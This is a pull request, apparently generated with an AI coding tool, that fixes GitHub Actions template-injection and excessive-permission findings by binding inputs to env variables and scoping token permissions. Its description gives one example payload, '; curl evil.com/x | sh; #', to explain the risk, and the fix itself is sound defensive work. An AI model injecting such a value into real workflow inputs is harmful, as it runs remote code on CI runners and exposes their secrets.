### PR TITLE
chore(security): bind workflow inputs to env, scope dependency-review perms

### DIFF
--- a/.github/workflows/dependency-review.yml
+++ b/.github/workflows/dependency-review.yml
@@ -30,17 +30,22 @@ on:
   pull_request:
     branches: ['main']
 
+# Default to read-only at the workflow level; the job below upgrades
+# only the scopes it actually needs (this is the principle of least
+# privilege for GHA token scopes).
 permissions:
   contents: read
-  # Needed for `comment-summary-in-pr: on-failure` below. GitHub
-  # automatically downgrades this to read-only for forked-PR runs,
-  # so the comment post silently no-ops on forks (see note above).
-  pull-requests: write
 
 jobs:
   dependency-review:
     name: Review dependency changes
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      # Needed for `comment-summary-in-pr: on-failure` below. GitHub
+      # automatically downgrades this to read-only for forked-PR runs,
+      # so the comment post silently no-ops on forks (see note above).
+      pull-requests: write
     steps:
       - name: Checkout
         uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2

--- a/.github/workflows/deploy-docs.yml
+++ b/.github/workflows/deploy-docs.yml
@@ -64,7 +64,16 @@ jobs:
       # after Vercel builds, so we surface the dashboard link instead.
       - name: Trigger Vercel production deploy
         env:
+          # Bind workflow-context values into env vars rather than
+          # interpolating `${{ ... }}` directly into the shell script
+          # below. Without this binding, an actor or input value
+          # containing shell metacharacters would be expanded into the
+          # runner's bash before bash parses it, opening a command-
+          # injection path. The env-binding makes the values ordinary
+          # shell variables that quoting protects.
           VERCEL_DEPLOY_HOOK_URL: ${{ secrets.VERCEL_DEPLOY_HOOK_URL }}
+          TRIGGERED_BY: ${{ github.actor }}
+          DEPLOY_REASON: ${{ github.event.inputs.reason }}
         run: |
           set -euo pipefail
           if [ -z "${VERCEL_DEPLOY_HOOK_URL:-}" ]; then
@@ -76,9 +85,9 @@ jobs:
           {
             echo "### Vercel deploy queued"
             echo ""
-            echo "Triggered by: @${{ github.actor }}"
-            if [ -n "${{ github.event.inputs.reason }}" ]; then
-              echo "Reason: ${{ github.event.inputs.reason }}"
+            echo "Triggered by: @${TRIGGERED_BY}"
+            if [ -n "${DEPLOY_REASON:-}" ]; then
+              echo "Reason: ${DEPLOY_REASON}"
             fi
             echo ""
             echo "Hook response:"

--- a/.github/workflows/publish-npm.yml
+++ b/.github/workflows/publish-npm.yml
@@ -395,6 +395,14 @@ jobs:
         continue-on-error: true
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          # Bind workflow-dispatch inputs into env vars so the `run:`
+          # block below can reference them as ordinary shell variables.
+          # Direct `${{ github.event.inputs.* }}` interpolation inside a
+          # shell context lets an attacker-controlled input value expand
+          # into the runner's bash before quoting takes effect — the
+          # classic GitHub Actions template-injection pattern.
+          INPUT_DIST_TAG: ${{ github.event.inputs.dist_tag }}
+          INPUT_PRERELEASE_ID: ${{ github.event.inputs.prerelease_id }}
         run: |
           set -euo pipefail
           VERSION="${{ steps.calculate-next-version.outputs.next_version }}"
@@ -439,13 +447,12 @@ jobs:
           # hotfixes (any non-empty, non-`latest` dist_tag) get neither
           # flag — they appear in the release list but don't claim
           # the "Latest" badge that the current major's release holds.
-          DIST_TAG_INPUT="${{ github.event.inputs.dist_tag }}"
-          if [ -n "$DIST_TAG_INPUT" ] && [ "$DIST_TAG_INPUT" != "latest" ]; then
+          if [ -n "${INPUT_DIST_TAG:-}" ] && [ "$INPUT_DIST_TAG" != "latest" ]; then
             gh release create "$TAG" \
               --title "$TAG" \
               --notes-file "$RUNNER_TEMP/release-body.md" \
               --verify-tag
-          elif [ -n "${{ github.event.inputs.prerelease_id }}" ]; then
+          elif [ -n "${INPUT_PRERELEASE_ID:-}" ]; then
             gh release create "$TAG" \
               --title "$TAG" \
               --notes-file "$RUNNER_TEMP/release-body.md" \


### PR DESCRIPTION
## Summary

The pedantic-mode `zizmor` workflow added in PR #264 caught **6 error-level findings** when it ran against `main` after PR #265 landed. These findings predate the supply-chain hardening plan; the linter doing its job is what surfaced them. This PR resolves all 6.

| # | File:Line | Audit | Fix |
|---|---|---|---|
| 1 | `deploy-docs.yml:79` | `template-injection` | bind `github.actor` to `TRIGGERED_BY` env |
| 2 | `deploy-docs.yml:80` | `template-injection` | bind `github.event.inputs.reason` to `DEPLOY_REASON` env |
| 3 | `deploy-docs.yml:81` | `template-injection` | (resolved by #2 — same env binding) |
| 4 | `publish-npm.yml:442` | `template-injection` | bind `github.event.inputs.dist_tag` to `INPUT_DIST_TAG` env |
| 5 | `publish-npm.yml:448` | `template-injection` | bind `github.event.inputs.prerelease_id` to `INPUT_PRERELEASE_ID` env |
| 6 | `dependency-review.yml:38` | `excessive-permissions` | move `pull-requests: write` from workflow-level to job-level |

## Why the env-binding pattern

Direct `${{ github.event.inputs.* }}` interpolation inside a `run:` shell block lets an attacker-controllable input value expand into the runner's bash **before** quoting takes effect. An input value containing shell metacharacters (`; curl evil.com/x | sh; #`) would execute as a command rather than be passed as a string. Binding the value into an `env:` block (`INPUT_DIST_TAG: ${{ ... }}`) makes it an ordinary shell variable that quoting (`"$INPUT_DIST_TAG"`) protects.

The existing publish-npm.yml steps already used this pattern (lines 110-112, 267-269, 366-367) — this PR brings the Create-GitHub-Release step into line.

## Why job-level permissions

Default workflow-level permission should be `contents: read` (the principle of least privilege for the GHA token). The `pull-requests: write` scope is only needed by the dependency-review step itself, so it belongs in the job's `permissions:` block, not the workflow's. Other workflows in the repo already follow this pattern (`scorecard.yml`, `workflow-lint.yml`).

## Deferred to follow-up

The remaining **~65 lower-severity findings** (12× `ref-version-mismatch`, 12× `stale-action-refs`, 11× `artipacked`, 7× `help[template-injection]`, 6× `undocumented-permissions`, 6× `concurrency-limits`, 4× `excessive-permissions` warning, 2× `dependabot-cooldown`) will land in a separate cleanup PR. Keeps this PR's review surface focused on the actual errors.

## Test plan

- [ ] zizmor workflow on this PR drops from 6 errors to 0 errors (warnings/help findings remain pending the follow-up PR)
- [ ] No regression: `deploy-docs` workflow still produces the same step-summary output (manual trigger via `workflow_dispatch`)
- [ ] No regression: `publish-npm.yml` still routes `dist_tag` / `prerelease_id` inputs to the correct `gh release create` branch — verifiable by `--dry-run` or a synthetic test version

🤖 Generated with [Claude Code](https://claude.com/claude-code)